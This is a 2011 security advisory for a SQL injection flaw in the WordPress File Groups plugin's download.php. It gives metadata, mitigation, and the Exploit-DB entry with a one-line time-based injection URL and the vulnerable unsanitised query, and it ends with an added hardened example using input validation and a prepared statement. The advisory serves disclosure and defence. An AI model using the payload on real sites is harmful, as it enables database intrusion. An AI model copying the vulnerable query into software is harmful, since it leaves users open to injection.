Vendor: File Groups
Author: Miroslav Stampar
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: File Groups
Affected Version From: 1.1.2002
Affected Version To: 1.1.2002
Patch Exists: YES
CPE: a:wordpress:file_groups
2011

WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'fgid' parameter of the 'download.php' script: the value is placed directly into a SQL query (see the vulnerable code below). A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database. This can be exploited to bypass certain security restrictions, access or modify data, or exploit various vulnerabilities in the underlying database.

Mitigation:

Update to version 1.1.3 or later.

Exploit-DB raw data:

# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip
# Version: 1.1.2 (tested)

---
PoC
---
http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))

---------------
Vulnerable code
---------------
$fgid = $_GET['fgid'];

...

$file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid");
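
A hardened form of the query above, as an added example; it is not the plugin's code and not the actual 1.1.3 patch. `fg_get_file_list` is a hypothetical helper name, and the snippet assumes it runs with WordPress loaded so that `$wpdb` and `status_header()` are available.

```php
<?php
// Added example, not the plugin's code. Assumes WordPress is loaded,
// so the global $wpdb (class wpdb) and status_header() exist.

/**
 * Hypothetical helper: return attachment GUIDs for one file group.
 * Returns null when the supplied id is not a positive integer.
 */
function fg_get_file_list( $wpdb, $raw_fgid ) {
    // 1. Validate: accept only a positive integer. A value such as the
    //    PoC's "-1 AND 1=BENCHMARK(...)" fails here and never reaches SQL.
    //    Missing (null) and array-valued input (fgid[]=1) fail as well.
    $fgid = filter_var(
        $raw_fgid,
        FILTER_VALIDATE_INT,
        array( 'options' => array( 'min_range' => 1 ) )
    );
    if ( false === $fgid ) {
        return null;
    }

    // 2. Bind: the %d placeholder makes wpdb::prepare() format the value
    //    as an integer, so the query text stays fixed even if the
    //    validation above is later relaxed. $wpdb->posts replaces the
    //    hard-coded "wp_posts" and respects a non-default table prefix.
    $sql = $wpdb->prepare(
        "SELECT guid FROM {$wpdb->posts} WHERE post_parent = %d",
        $fgid
    );

    return $wpdb->get_col( $sql );
}

global $wpdb;
$raw_fgid  = isset( $_GET['fgid'] ) ? $_GET['fgid'] : null;
$file_list = fg_get_file_list( $wpdb, $raw_fgid );

if ( null === $file_list ) {
    // Reject malformed ids with a client error instead of running a query.
    status_header( 400 );
    exit;
}
```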